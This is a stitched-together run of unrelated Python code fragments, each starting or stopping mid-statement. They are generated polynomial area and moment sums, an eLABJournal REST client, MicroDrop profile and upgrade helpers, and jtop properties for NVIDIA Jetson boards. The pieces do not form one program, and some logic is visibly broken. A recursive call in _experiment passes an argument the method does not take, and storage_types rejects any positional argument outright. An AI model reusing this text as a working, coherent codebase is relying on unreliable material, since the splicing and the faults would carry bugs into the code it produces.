15*r26 r28 = -r25*y1 + r27 r29 = r25*y2 r30 = r9*x3 r31 = 45*x1 r32 = x1*x3 r33 = 45*r20 r34 = 5*r14 r35 = x2*y2 r36 = 18*r35 r37 = 5*x3 r38 = r37*y3 r39 = r31*y1 + r36 + r38 r40 = x1*y0 r41 = x1*y3 r42 = x2*y0 r43 = x3*y1 r44 = r10*x3 r45 = x3*y2*y3 r46 = y2**2 r47 = 45*r46 r48 = r47*x3 r49 = y3**2 r50 = r49*x3 r51 = y1**2 r52 = 9*r51 r53 = y0**2 r54 = 21*x1 r55 = x3*y2 r56 = 15*r55 r57 = 9*y2 r58 = y2*y3 r59 = 15*r58 r60 = 9*r46 r61 = 3*y3 r62 = 45*y1 r63 = r8*y3 r64 = y0*y1 r65 = y0*y2 r66 = 30*r65 r67 = 5*y3 r68 = y1*y3 r69 = 45*r51 r70 = 5*r49 r71 = x2**3 r72 = x3**3 r73 = 126*x3 r74 = x1**3 r75 = r14*x2 r76 = 63*r11 r77 = r76*x3 r78 = 15*r35 r79 = r19*x3 r80 = x1*y1 r81 = 63*r35 r82 = r38 + 378*r80 + r81 r83 = x1*y2 r84 = x2*y1 r85 = x3*y0 r86 = x2*x3*y1 r87 = x2*x3*y3 r88 = r11*y2 r89 = 27*r88 r90 = 42*y3 r91 = r14*r90 r92 = 90*x1*x2 r93 = 189*x2 r94 = 30*x1*x3 r95 = 14*r16 + 126*r20*y1 + 45*r88 + r94*y2 r96 = x1*x2 r97 = 252*r96 r98 = x1*x2*y2 r99 = 42*r32 r100 = x1*x3*y1 r101 = 30*r17 r102 = 18*r17 r103 = 378*r20 r104 = 189*y2 r105 = r20*y3 r106 = r11*y1 r107 = r14*y1 r108 = 378*r46 r109 = 252*y2 r110 = y1*y2 r111 = x2*x3*y2 r112 = y0*y3 r113 = 378*r51 r114 = 63*r46 r115 = 27*x2 r116 = r115*r46 + 42*r50 r117 = x2*y1*y3 r118 = x3*y1*y2 r119 = r49*x2 r120 = r51*x3 r121 = x3*y3 r122 = 14*x3 r123 = 30*r117 + r122*r49 + r47*x2 + 126*r51*x1 r124 = x1*y1*y3 r125 = x1*y2*y3 r126 = x2*y1*y2 r127 = 54*y3 r128 = 21*r55 r129 = 630*r53 r130 = r46*x1 r131 = r49*x1 r132 = 126*r53 r133 = y2**3 r134 = y3**3 r135 = 630*r49 r136 = y1**3 r137 = y0**3 r138 = r114*y3 + r23*r49 r139 = r49*y2 self.area += r1/20 - r2*x3/20 - r4/20 + r5*(y2 + y3)/20 - r6*(x2 + x3)/20 + x0*(r10 + r9 + 10*y0 + y3)/20 - y0*(r7 + r8 + x3)/20 self.momentX += r13/840 - r15/8 - r16/3 - r18*(r10 - r19)/840 + r21*(r10 + 2*y3)/840 + r22*(r2 + r23 + 56*y0 + y3)/168 + r5*(r28 + r29 - r30 + r4)/840 - r6*(10*r14 + r18 + r24)/840 + x0*(12*r26 + r31*y2 - r37*y0 + r39 - 105*r40 + 15*r41 - 30*r42 - 3*r43 + r44)/840 
- y0*(18*r11 + r18 + r31*x2 + 12*r32 + r33 + r34)/840 self.momentY += r27*(r10 + r19)/840 - r45/8 - r48/840 + r5*(10*r49 + r57*y1 + r59 + r60 + r9*y3)/840 - r50/6 - r52*(r8 + 2*x3)/840 - r53*(r0 + r54 + x3)/168 - r6*(r29 + r4 + r56)/840 + x0*(18*r46 + 140*r53 + r59 + r62*y2 + 105*r64 + r66 + r67*y0 + 12*r68 + r69 + r70)/840 - y0*(r39 + 15*r43 + 12*r55 - r61*x1 + r62*x2 + r63)/840 self.momentXX += -r11*r73*(-r61 + y2)/9240 + r21*(r28 - r37*y1 + r44 + r78 + r79)/9240 + r22*(21*r26 - 630*r40 + 42*r41 - 126*r42 + r57*x3 + r82 + 210*r83 + 42*r84 - 14*r85)/9240 - r5*(r11*r62 + r14*r23 + 14*r15 - r76*y3 + 54*r86 - 84*r87 - r89 - r91)/9240 - r6*(27*r71 + 42*r72 + 70*r75 + r77)/9240 + 3*r71*y3/220 - 3*r72*y2/44 - r72*y3/4 + 3*r74*(r57 + r67)/3080 - r75*(378*y2 - 630*y3)/9240 + x0**3*(r57 + r62 + 165*y0 + y3)/660 + x0*(-18*r100 - r101*y0 - r101*y1 + r102*y2 - r103*y0 + r104*r20 + 63*r105 - 27*r106 - 9*r107 + r13 - r34*y0 - r76*y0 + 42*r87 + r92*y3 + r94*y3 + r95 - r97*y0 + 162*r98 - r99*y0)/9240 - y0*(135*r11*x1 + r14*r54 + r20*r93 + r33*x3 + 45*r71 + 14*r72 + 126*r74 + 42*r75 + r77 + r92*x3)/9240 self.momentXY += -r108*r14/18480 + r12*(r109 + 378*y3)/18480 - r14*r49/8 - 3*r14*r58/44 - r17*(252*r46 - 1260*r49)/18480 + r21*(18*r110 + r3*y1 + 15*r46 + 7*r49 + 18*r58)/18480 + r22*(252*r110 + 28*r112 + r113 + r114 + 2310*r53 + 30*r58 + 1260*r64 + 252*r65 + 42*r68 + r70)/18480 - r52*(r102 + 15*r11 + 7*r14)/18480 - r53*(r101 + r103 + r34 + r76 + r97 + r99)/18480 + r7*(-r115*r51 + r116 + 18*r117 - 18*r118 + 42*r119 - 15*r120 + 28*r45 + r81*y3)/18480 - r9*(63*r111 + 42*r15 + 28*r87 + r89 + r91)/18480 + x0*(r1*y0 + r104*r80 + r112*r54 + 21*r119 - 9*r120 - r122*r53 + r123 + 54*r124 + 60*r125 + 54*r126 + r127*r35 + r128*y3 - r129*x1 + 81*r130
None: for key, value in kwargs.items(): if key in kwargs_special: request["$"+key] = value elif key in kwargs_keys: request[key] = value else: raise Exception("unsupported key '"+key+"'") return(Experiments(self, "Experiments", "/api/v1/experiments", request, "experimentID", 5, self.experiment)) def studies(self, *args, **kwargs): """ Get object to access studies. Parameters (object) ---------------------- class: parser Pass the result of the first() method on this object instead class: project Filter by projectID of this object Parameters (key/value) ---------------------- expand : str, optional Expand an ID field to an object sort : str, optional Sort by a specific field studyID : str, optional Filter by studyID search : str, optional Search experiments by name or contents projectID : str, optional Filter by projectID """ request = {"$sort": "studyID DESC"} kwargs_special = ["expand", "sort"] kwargs_keys = ["studyID", "search", "projectID"] if args is not None: for arg in args: check_arg = arg if isinstance(check_arg,eLABJournalPager): check_arg = arg.first(True) if isinstance(check_arg,Project): request["projectID"] = check_arg.id() else: raise Exception("unsupported object '"+str(type(check_arg))+"'") if kwargs is not None: for key, value in kwargs.items(): if key in kwargs_special: request["$"+key] = value elif key in kwargs_keys: request[key] = value else: raise Exception("unsupported key '"+key+"'") return(Studies(self,"Studies", "/api/v1/studies", request, "studyID", 5, self.study)) def study(self, id, **kwargs): """ Get study object with provided id. 
Parameters (key/value) ---------------------- expand : str, optional Expand an ID field to an object """ if isinstance(id,numbers.Integral) | isinstance(id,str): request = {"studyID": str(id)} kwargs_special = ["expand"] kwargs_keys = [] if kwargs is not None: for key, value in kwargs.items(): if key in kwargs_special: request["$"+key] = value elif key in kwargs_keys: request[key] = value else: raise Exception("unsupported key '"+key+"'") rp = self._request("/api/v1/studies", "get", request) #check and get if (rp is not None) & isinstance(rp,dict) & ("data" in rp) & isinstance(rp["data"],list) & (len(rp["data"])==1): return(Study(self,rp["data"][0])) else: return(None) else: raise Exception("incorrect call") def storage_types(self, *args, **kwargs): """ Get object to access storageTypes. Parameters (key/value) ---------------------- expand : str, optional Expand an ID field to an object sort : str, optional Sort by a specific field deviceType : str, optional Filter by the storage type's device type (STORAGE or EQUIPMENT) """ request = {} kwargs_special = ["expand", "sort"] kwargs_keys = ["deviceType"] if args is not None: for arg in args: check_arg = arg if isinstance(check_arg,eLABJournalPager): check_arg = arg.first(True) raise Exception("unsupported object '"+str(type(check_arg))+"'") if kwargs is not None: for key, value in kwargs.items(): if key in kwargs_special: request["$"+key] = value elif key in kwargs_keys: request[key] = value else: raise Exception("unsupported key '"+key+"'") return(StorageTypes(self,"Storage Types", "/api/v1/storageTypes", request, "storageTypeID", 5, self.storage_type)) def storage_type(self, id): """ Get storage type object with provided id. 
""" if isinstance(id,numbers.Integral) | isinstance(id,str): rp = self._request("/api/v1/storageTypes/"+urllib.parse.quote(str(id)), "get", {}) #check and get if not(rp==None) & (type(rp) == dict): return(StorageType(self,rp)) else: return(None) else: raise Exception("incorrect call") def storage_layers(self, *args, **kwargs): """ Get object to access storageLayers. Parameters (object) ---------------------- class: parser Pass the result of the first() method on this object instead class: storage_layer Filter by storageLayerID of this object as parent class: storage Filter by storageID of this object Parameters (key/value) ---------------------- expand : str, optional Expand an ID field to an object separate values with comma for multiple expands storage, location, storageLayers, samples, managers, reservations / allReservations sort : str, optional Sort by a specific field name : str, optional Filter by name barcodes : str, optional Filter by barcodes (comma-separated) parentStorageLayerID : str, optional Filter by parentStorageLayerID storageID : str, optional Filter by storageID """ request = {} kwargs_special = ["expand", "sort"] kwargs_keys = ["name","barcodes","parentStorageLayerID","storageID","deviceType"] if args is not None: for arg in args: check_arg = arg if isinstance(check_arg,eLABJournalPager): check_arg = arg.first(True) if isinstance(check_arg,Storage): request["storageID"] = check_arg.id() elif isinstance(check_arg,StorageLayer): request["parentStorageLayerID"] = check_arg.id() else: raise Exception("unsupported object '"+str(type(check_arg))+"'") if kwargs is not None: for key, value in kwargs.items(): if key in kwargs_special: request["$"+key] = value elif key in kwargs_keys: request[key] = value else: raise Exception("unsupported key '"+key+"'") return(StorageLayers(self,"Storage Layers", "/api/v1/storageLayers", request, "storageLayerID", 5, self.storage_layer)) def storage_layer(self, id, **kwargs): """ Get storage layer object with provided 
id. Parameters (key/value) ---------------------- expand : str, optional Expand an ID field to an object separate values with comma for multiple expands storage, location, storageLayers, samples, managers, reservations / allReservations, statistics """ if isinstance(id,numbers.Integral) | isinstance(id,str): request = {} kwargs_special = ["expand"] kwargs_keys = [] if kwargs is not None: for key, value in kwargs.items(): if key in kwargs_special: request["$"+key] = value elif key in kwargs_keys: request[key] = value else: raise Exception("unsupported key '"+key+"'") rp = self._request("/api/v1/storageLayers/"+urllib.parse.quote(str(id)), "get", request) #check and get if not(rp==None) & (type(rp) == dict): return(StorageLayer(self,rp)) else: return(None) else: raise Exception("incorrect call") def experiment(self, id): """ Get experiment object with provided id. """ return(self._experiment(id,0)) def _experiment(self, id, page): """ Workaround to get experiment """ if isinstance(id,numbers.Integral) | isinstance(id,str): request = {"$page": int(page)} rp = self._request("/api/v1/experiments", "get", request) #check and get if not(rp==None) & (type(rp) == dict): if ("totalRecords" in rp.keys()) & ("maxRecords" in rp.keys()) & (rp["totalRecords"]>=1): maxPage = math.ceil(rp["totalRecords"]/rp["maxRecords"]) if "data" in rp.keys(): for dataItem in rp["data"]: if(dataItem["experimentID"]==id): return(Experiment(self, dataItem)) page+=1 if page < maxPage: return(self.experiment(id,page)) else: return(None) else: return(None) else: return(None) else: return(None) else: raise Exception("incorrect call") def section(self, section_id): """ Get section object with provided id. 
""" rp = self._request("/api/v1/experiments/sections/"+urllib.parse.quote(str(section_id)), "get", {}) #check and get if not(rp==None) & (type(rp) == dict): if "sectionType" in rp: section_type = str(rp["sectionType"]) if section_type == "PARAGRAPH": return(SectionParagraph(self,rp)) elif section_type == "COMMENT": return(SectionComment(self,rp)) elif section_type == "PROCEDURE": return(SectionProcedure(self,rp)) elif section_type == "DATATABLE": return(SectionDatatable(self,rp)) elif section_type == "CANVAS": return(SectionCanvas(self,rp)) elif section_type == "EXCEL": return(SectionExcel(self,rp)) elif section_type == "IMAGE": return(SectionImage(self,rp)) elif section_type == "FILE": return(SectionFile(self,rp)) elif section_type == "SAMPLESIN": return(SectionSample(self,rp)) elif section_type == "SAMPLESOUT": return(SectionSample(self,rp)) else: return(Section(self,rp)) else: raise Exception("no sectionType in response") else: return(None) def _request(self, location, method, request, key=None, show_messages=True, stream=False, headers=None): if not location.startswith("http"): request_location = self.__url+location else: request_location = location if key==None: key = self.__key try: request_headers = {"Accept": "application/json"} request_headers.update({"Authorization": key}) if not(headers==None): request_headers.update(headers) if method=="get": if isinstance(request,dict): data = request else: raise Exception("unsupported type of request") response = requests.get(request_location, params=data, timeout=self.__timeout, headers=request_headers, stream=stream) elif method=="post": if "Content-Type" in request_headers: data = request elif isinstance(request,str): request_headers.update({"Content-Type": "application/json"}) data = request elif isinstance(request,dict) | isinstance(request,int): request_headers.update({"Content-Type": "application/json"}) data = json.dumps(request) else: raise Exception("unsupported type of request") response = 
requests.post(request_location, data=data, timeout=self.__timeout, headers=request_headers, stream=stream) elif method=="put": if isinstance(request,str) | isinstance(request,bytes): data = request elif isinstance(request,dict) | isinstance(request,int): request_headers.update({"Content-Type": "application/json"}) data = json.dumps(request) else: raise Exception("unsupported type of request") response = requests.put(request_location, data=data, timeout=self.__timeout, headers=request_headers, stream=stream) elif method=="patch": if isinstance(request,str): request_headers.update({"Content-Type": "application/json"}) data = request elif isinstance(request,dict): request_headers.update({"Content-Type": "application/json"}) data = json.dumps(request) else: raise Exception("unsupported type of request") response = requests.patch(request_location, data=data, timeout=self.__timeout, headers=request_headers, stream=stream) elif method=="delete": if isinstance(request,dict): data = request else: raise Exception("unsupported type of request") response = requests.delete(request_location, params=data, timeout=self.__timeout, headers=request_headers, stream=stream) else: raise Exception("unsupported method") response.raise_for_status() #no content if response.status_code == 204: return(None) elif stream: return(response) else: try: return(json.loads(response.text)) except json.JSONDecodeError as decodeErr: print ("JSON Decode Error:",decodeErr) raise Exception("no (valid) response from eLABJournal") except requests.exceptions.HTTPError as httpErr: if show_messages: print ("Http Error:",httpErr) try: return(json.loads(response.text)) except json.JSONDecodeError as decodeErr: return(None) except requests.exceptions.ConnectionError as connErr: if show_messages: print ("Error Connecting:",connErr) return(None) except requests.exceptions.Timeout as timeOutErr: if show_messages: print ("Timeout Error:",timeOutErr) return(None) except requests.exceptions.RequestException as reqErr: 
if show_messages: print ("Something Else:",reqErr) return(None) raise Exception("no (valid) response from eLABJournal") def _create_methods(self, o): """
def check_version_cache_for_upgrade():
    '''
    Prompt user to offer to upgrade if cached latest MicroDrop version is
    newer than currently installed version.

    .. versionadded:: 0.7.8
    '''
    # NOTE(review): Python 2 module (see the `print` statement below); do not
    # port piecemeal.
    # Get currently installed `microdrop` package information.
    #
    # Example `installed_info`:
    #
    #     {u'base_url': None,
    #      u'build_number': 0,
    #      u'build_string': u'0',
    #      u'channel': u'sci-bots',
    #      u'dist_name': u'microdrop-2.10.2-0',
    #      u'name': u'microdrop',
    #      u'platform': None,
    #      u'version': u'2.10.2',
    #      u'with_features_depends': None}
    try:
        installed_info = ch.package_version('microdrop', verbose=False)
    except NameError:
        # Installed MicroDrop Conda package not found (perhaps this is a
        # development environment?)
        return
    cached_path, cached_info = load_cached_version()
    latest_version = cached_info.get('version')
    installed_version = installed_info.get('version')
    # If cached latest MicroDrop version is more recent than the currently
    # installed version, prompt user to offer to upgrade.
    if all([GUI_AVAILABLE, not cached_info.get('ignore'),
            latest_version is not None]):
        if (pkg_resources.parse_version(latest_version) <=
                pkg_resources.parse_version(installed_version)):
            # Already up to date (or ahead); nothing to offer.
            return
        # Display dialog.
        dialog = gtk.MessageDialog(type=gtk.MESSAGE_QUESTION)
        dialog.set_icon_from_file(ICON_PATH)
        dialog.set_title('Upgrade to MicroDrop v{}'.format(latest_version))
        dialog.add_buttons(gtk.STOCK_YES, gtk.RESPONSE_YES, "Not now",
                           gtk.RESPONSE_NO, "Never", gtk.RESPONSE_CANCEL)
        dialog.set_markup('A new version of MicroDrop is available.\n\n'
                          'Would you like to upgrade to MicroDrop v{} (current'
                          ' version: v{})?'.format(latest_version,
                                                   installed_version))
        response = dialog.run()
        dialog.destroy()
        if response == gtk.RESPONSE_CANCEL:
            # "Never": ignore this specific version from now on.
            try:
                with cached_path.open('w') as output:
                    cached_info = {'version': latest_version, 'ignore': True}
                    yaml.dump(cached_info, stream=output)
                print ('new version available: MicroDrop v{} (not installing '
                       'now)'.format(latest_version))
            except:
                # Best-effort: failing to cache the choice is non-fatal.
                logger.error('Error caching latest version.', exc_info=True)
        elif response == gtk.RESPONSE_YES:
            # User selected `Yes`, so upgrade MicroDrop, but restrict upgrade
            # to within the same major version.
            try:
                major_version = int(cre_version.match(installed_version)
                                    .group('major'))
                install_log_json = ch.conda_exec('install', '--json',
                                                 'microdrop >={}, <{}'
                                                 .format(major_version,
                                                         major_version + 1))
                install_response = json.loads(install_log_json)
                unlinked, linked = ch.install_info(install_response)
                print ch.format_install_info(unlinked, linked)
                try:
                    # Remove stale cached MicroDrop version data.
                    cached_path.remove()
                except:
                    pass
            except:
                # Best-effort: log and continue running the current version.
                logger.error('Error upgrading MicroDrop.', exc_info=True)


def load_profiles_info(profiles_path):
    '''
    Load list of profiles from file.

    If file does not exist or list is empty, the profile list is initialized
    with the default profile directory path (creating a profile at the default
    location, if it does not already exist).

    .. versionchanged:: 0.1.post61
        If profile already exists in the default profile path, but the profile
        does not match the MicroDrop major version, a default profile path is
        used that is specific to MicroDrop major version of the form
        ``MicroDrop-v<major_version>``.

    Parameters
    ----------
    profiles_path : str
        Path to file containing list of profiles.

    Returns
    -------
    df_profiles : pandas.DataFrame
        Table of MicroDrop profile descriptions including the columns:

        - ``path`` File system path to profile directory.
        - ``used_timestamp`` Most recent time that profile was launched.
    '''
    profiles_path = ph.path(profiles_path)
    profiles_path.parent.makedirs_p()
    if profiles_path.exists():
        with profiles_path.open('r') as input_:
            profiles_str = input_.read()
        try:
            # Keep only profiles whose directory still exists on disk.
            # NOTE(review): yaml.load without an explicit Loader — unsafe on
            # untrusted input; the profiles file is assumed locally owned.
            profiles = [profile_i for profile_i in yaml.load(profiles_str)
                        if ph.path(profile_i['path']).isdir()]
        except:
            logger.error('Error reading list of profiles from `%s`.',
                         profiles_path, exc_info=True)
            profiles = []
    else:
        profiles = []
    default_profile_path = mpm.bin.get_plugins_directory().parent
    if default_profile_path.isdir():
        try:
            # Verify default profile directory matches major MicroDrop version.
            verify_or_create_profile_version(default_profile_path)
        except VersionError:
            # Default profile path already exists, but profile does not match
            # MicroDrop major version.
            # Query the currently installed version of the MicroDrop Python
            # package.
            installed_version_str = (pkg_resources
                                     .get_distribution('microdrop').version)
            major_version = get_major_version(installed_version_str)
            # Use default profile path specific to MicroDrop major version.
            default_profile_path = (default_profile_path.parent
                                    .joinpath('MicroDrop-v{}'
                                              .format(major_version)))
    if not profiles and not default_profile_path.isdir():
        # No existing profiles. Create default profile.
        print ('No existing profiles. Create default profile at {}.'
               .format(default_profile_path))
        create_config_directory(output_dir=default_profile_path)
        for sub_directory_i in ('devices', 'plugins'):
            default_profile_path.joinpath(sub_directory_i).makedirs_p()
        # Create a `RELEASE-VERSION` file and populate it with the installed
        # MicroDrop package version.
        release_version_path = default_profile_path.joinpath('RELEASE-VERSION')
        with release_version_path.open('w') as output:
            output.write(pkg_resources.get_distribution('microdrop').version)
        if GUI_AVAILABLE:
            major_version = installed_major_version()
            dialog = gtk.MessageDialog(type=gtk.MESSAGE_INFO)
            dialog.set_icon_from_file(ICON_PATH)
            dialog.set_title('New MicroDrop {} profile created'
                             .format(major_version))
            dialog.add_buttons(gtk.STOCK_OK, gtk.RESPONSE_OK)
            dialog.set_markup('No existing profiles for MicroDrop {}.\n\n'
                              'Created default profile at {}.'
                              .format(major_version, default_profile_path))
            dialog.run()
            dialog.destroy()
    if not profiles and default_profile_path.isdir():
        # No profiles list found or empty profiles list.
        #
        # Use default profile path.
        profiles = [{'path': str(default_profile_path),
                     'used_timestamp': None}]
        df_profiles = pd.DataFrame(None, columns=SAVED_COLUMNS)
        df_profiles = import_profile(df_profiles, default_profile_path,
                                     parent=None)
    else:
        df_profiles = pd.DataFrame(profiles, columns=SAVED_COLUMNS)
    # Normalize missing timestamps, newest-first, one row per profile path.
    df_profiles.loc[df_profiles.used_timestamp == 'nan',
                    'used_timestamp'] = ''
    df_profiles.sort_values('used_timestamp', ascending=False, inplace=True)
    df_profiles.drop_duplicates(subset=['path'], inplace=True)
    return df_profiles
    missing : bool, optional
        If ``True``, drop rows for profiles where no ``RELEASE-VERSION`` file
        is found in the profile directory.
    mismatch : bool, optional
        If ``True``, drop rows for profiles where major version in
        ``RELEASE-VERSION`` file and major version of installed MicroDrop
        package **do not match**.
    inplace : bool, optional
        If ``True``, rows are dropped from ``df_profiles`` in place and the
        *same* (mutated) frame is returned; otherwise a new frame with the
        offending rows removed is returned.
    '''
    def version_error(profile_path):
        # Classify one profile path: return True when the profile should be
        # dropped according to the `missing`/`mismatch` flags.
        try:
            verify_profile_version(profile_path)
        except VersionError:
            # Major version in `RELEASE-VERSION` file and major version of
            # installed MicroDrop package **do not match**.
            return mismatch
        except IOError:
            # No `RELEASE-VERSION` file found in the profile directory.
            return missing
        else:
            return False

    error_mask = df_profiles.path.map(version_error)
    # NOTE: `DataFrame.drop(..., inplace=True)` returns None, so `result` is
    # only meaningful on the non-inplace path below.
    result = df_profiles.drop(error_mask[error_mask].index, inplace=inplace)
    if inplace:
        return df_profiles
    else:
        return result


def verify_profile_version(profile_path):
    '''
    Verify that the profile at ``profile_path`` matches the installed
    MicroDrop major version.

    Parameters
    ----------
    profile_path : str
        Path to profile directory.

    Raises
    ------
    IOError
        If no version file found in profile directory.
    VersionError
        If profile version does not match installed MicroDrop version.
    '''
    profile_path = ph.path(profile_path)

    release_version_path = profile_path.joinpath('RELEASE-VERSION')

    # Query the currently installed version of the MicroDrop Python package.
    installed_version_str = pkg_resources.get_distribution('microdrop').version
    installed_version = pkg_resources.parse_version(installed_version_str)

    if release_version_path.isfile():
        # A `RELEASE-VERSION` file exists in the same directory as the
        # configuration file.
        #
        # Parse the version from the `RELEASE-VERSION` file (first line only).
        release_version_str = release_version_path.lines()[0]
        release_version = pkg_resources.parse_version(release_version_str)
    else:
        # No `RELEASE-VERSION` file found in the profile directory.
        raise IOError('No version file found in profile directory.')

    # `release_version_str` is always bound here, since the `else` branch
    # above raises.
    if not (get_major_version(release_version_str) ==
            get_major_version(installed_version_str)):
        # Major version in `RELEASE-VERSION` file and major version of
        # installed MicroDrop package **do not match**.
        #
        # Notify the user and wait for user input to continue.
        raise VersionError('Configuration directory major version (%s) does '
                           'not match installed major MicroDrop version (%s)'
                           % (release_version, installed_version))


def verify_or_create_profile_version(profile_path):
    '''
    Verify the profile's ``RELEASE-VERSION`` stamp, creating one (after
    optional user confirmation) when it is missing.

    Raises
    ------
    VersionError
        If the profile version mismatches, or if the user declines to adopt
        an unstamped profile.
    '''
    profile_path = ph.path(profile_path)

    try:
        verify_profile_version(profile_path)
    except IOError:
        # No `RELEASE-VERSION` file found in the profile directory.
        if GUI_AVAILABLE:
            # Prompt user to confirm profile version matches installed
            # MicroDrop version.
            dialog = gtk.MessageDialog(type=gtk.MESSAGE_QUESTION)
            dialog.set_icon_from_file(ICON_PATH)
            dialog.set_title('Confirm MicroDrop {} profile'
                             .format(installed_major_version()))
            dialog.add_buttons(gtk.STOCK_YES, gtk.RESPONSE_YES,
                               gtk.STOCK_NO, gtk.RESPONSE_NO)
            dialog.set_markup('Unable to determine compatible MicroDrop '
                              'version from profile:\n\n {}\n\n'
                              'Was this profile created using the installed '
                              'version of MicroDrop ({})?'
                              .format(profile_path, installed_major_version()))
            # Reach into the dialog's label widget to attach a tooltip with
            # the full profile path.
            label = (dialog.get_content_area().get_children()[0]
                     .get_children()[-1].get_children()[0])
            label.set_tooltip_text(profile_path)
            response = dialog.run()
            dialog.destroy()
            if response == gtk.RESPONSE_NO:
                raise VersionError('Not launching MicroDrop since profile was '
                                   'not created using the installed version of'
                                   ' MicroDrop ({})'
                                   .format(installed_major_version()))
        # Create a `RELEASE-VERSION` file and populate it with the installed
        # MicroDrop package version.
release_version_path = profile_path.joinpath('RELEASE-VERSION') with release_version_path.open('w') as output: output.write(pkg_resources.get_distribution('microdrop').version) def environment_prompt(profile_path): ''' Launch command prompt window for Python environment, with environment variables set for MicroDrop profile and configuration paths (non-blocking). .. versionadded:: 0.1.post64 ''' profile_path = ph.path(profile_path) config_file = profile_path.joinpath('microdrop.ini') env = os.environ.copy() # Set environment variables for MicroDrop profile and configuration paths. env['MICRODROP_PROFILE'] = str(profile_path) env['MICRODROP_CONFIG'] = str(config_file) # Launch command prompt if platform.system() == 'Windows': if ch.conda_prefix() is not None: command = (r'start cmd "/K" {prefix}\Scripts\activate.bat {prefix}' .format(prefix=ch.conda_prefix())) else: command = r'start cmd' sp.call(command, shell=True, cwd=str(profile_path), env=env) else: raise RuntimeError('OS not currently supported: {}' .format(platform.system())) def launch_profile(profile_path): ''' 1. If cached latest MicroDrop version is newer than currently installed version, prompt user to offer to upgrade. 2. Launch MicroDrop using specified profile path. .. versionchanged:: 0.7.2 Launch MicroDrop in an **activated** Conda environment. Parameters ---------- profile_path : str File-system path to MicroDrop profile directory. Returns ------- int Exit code from MicroDrop program. ''' # Prompt user to upgrade MicroDrop
speed is the same that you have set in *jetson.fan.speed* :return: Status Fan :rtype: Fan :raises ValueError: Wrong speed number or wrong mode name """ return self._fan @property def nvpmodel(self): """ From this function you set and read NV Power Mode. If your NVIDIA Jetson does not use nvpmodel will return None If you want set a new nvpmodel you can follow the NVIDIA Jetson documentation and write a string like below .. code-block:: python # You can write a string for a name or an integer for the ID jetson.nvpmodel = name_or_id If you need to increase or decrease the ID you can use .. code-block:: python jetson.nvpmodel += 1 # or jetson.nvpmodel = jetson.nvpmodel + 1 There are other properties: * **name** - mode name * **id** - ID name * **modes** - A list with all mode available in your board * **status** - A list of status for each NVP model (False if the nvpmodel is in failure) * **is_running** - Status updating NVP model service The access of this properities is available like below .. code-block:: python # NVP model name print(jetson.nvpmodel.name) # NVP model id print(jetson.nvpmodel.id) # NVP model list print(jetson.nvpmodel.modes) # NVP model status print(jetson.nvpmodel.status) :return: Return the name of NV Power Mode :rtype: NVPModel or None :raises JtopException: if the nvp model does not exist* """ return self._nvp @nvpmodel.setter def nvpmodel(self, value): if self._nvp is None: return mode = self._nvp.set(value) # Do not send messages if nvpmodel is the same if mode == self._nvp.id: return # Send new nvpmodel self._controller.put({'nvp': mode}) @property def jetson_clocks(self): """ Status jetson_clocks, if you want change the jetson_clocks status you can simply write: .. 
code-block:: python jetson.jetson_clocks = value where *value* is a boolean value There are availabe other extra properties: * **boot** - You can enable and disable on boot **jetson_clocks** * **status** - A string with the current jetson_clocks status * *running* - The service is running * *booting* - jetson_clocks is in booting (When your board boot, jetson_clocks wait 60s before to start) * *activating* - jetson_clocks is activating * *deactivating* - jetson_clocks is deactivating You can change and edit using this property: .. code-block:: python # Read jetson_clocks boot property print(jetson.jetson_clocks.boot) # Set a new value jetson.jetson_clocks.boot = value # True or False Written jetson_clocks status .. code-block:: python # Status jetson_clocks print(jetson.jetson_clocks.status) :return: status jetson_clocks script :rtype: JetsonClocks :raises ValueError: Wrong jetson_clocks value """ return self._jc @jetson_clocks.setter def jetson_clocks(self, value): if not isinstance(value, bool): raise TypeError("Use a boolean") if not self._jc.is_config and not value: raise JtopException("I cannot set jetson_clocks.\nPlease shutdown manually jetson_clocks") # Check if service is not started otherwise skip if self._jc.status in ['booting', 'activating', 'deactivating']: return if value != self._jc.is_alive: # Send status jetson_clocks self._controller.put({'jc': {'enable': value}}) @property def stats(self): """ This property return a simplified version of tegrastats, it is simple to use if you want log the NVIDIA Jetson status with pandas or in a csv file. 
This property is a simplified version of all data collected from your NVIDIA Jetson, if you need more detailed information, please use the other jtop properties The field listed are: * **time** - A `datetime` variable with the local time in your board * **uptime** - A `timedelta` with the up time of your board, same from :func:`~jtop.jtop.jtop.uptime` * **jetson_clocks** - Status of jetson_clocks, human readable :func:`~jtop.jtop.jtop.jetson_clocks` * **nvp model** - If exist, the NV Power Model name active :func:`~jtop.jtop.jtop.nvpmodel` * **cpu X** - The status for each cpu in your board, if disabled you will read *OFF* * **GPU** - Status of your GPU :func:`~jtop.jtop.jtop.gpu` * **MTS FG** - Foreground tasks :func:`~jtop.jtop.jtop.mts` * **MTS BG** - Background tasks :func:`~jtop.jtop.jtop.mts` * **RAM** - Used ram :func:`~jtop.jtop.jtop.ram` * **EMC** - If exist, the used emc :func:`~jtop.jtop.jtop.emc` * **IRAM** - If exist, the used iram :func:`~jtop.jtop.jtop.iram` * **SWAP** - If exist, the used swap :func:`~jtop.jtop.jtop.swap` * **APE** - Frequency APE engine :func:`~jtop.jtop.jtop.engine` * **NVENC** - Frequency NVENC engine :func:`~jtop.jtop.jtop.engine` * **NVDEC** - Frequency NVDEC engine :func:`~jtop.jtop.jtop.engine` * **NVJPG** - Frequency NVJPG engine :func:`~jtop.jtop.jtop.engine` * **fan** - Status fan speed :func:`~jtop.jtop.jtop.fan` * **Temp X** - X temperature :func:`~jtop.jtop.jtop.temperature` * **power cur** - Total current power :func:`~jtop.jtop.jtop.power` * **power avg** - Total average power :func:`~jtop.jtop.jtop.power` :return: Compacts jetson statistics :rtype: dict """ stats = {'time': datetime.now(), 'uptime': self.uptime} # -- jetson_clocks -- if self.jetson_clocks is not None: stats['jetson_clocks'] = 'ON' if self.jetson_clocks else 'OFF' # -- NV Power Model -- if self.nvpmodel is not None: stats['nvp model'] = self.nvpmodel.name # -- CPU -- for cpu in sorted(self.cpu): stats[cpu] = self.cpu[cpu].get('val', 'OFF') # -- GPU -- 
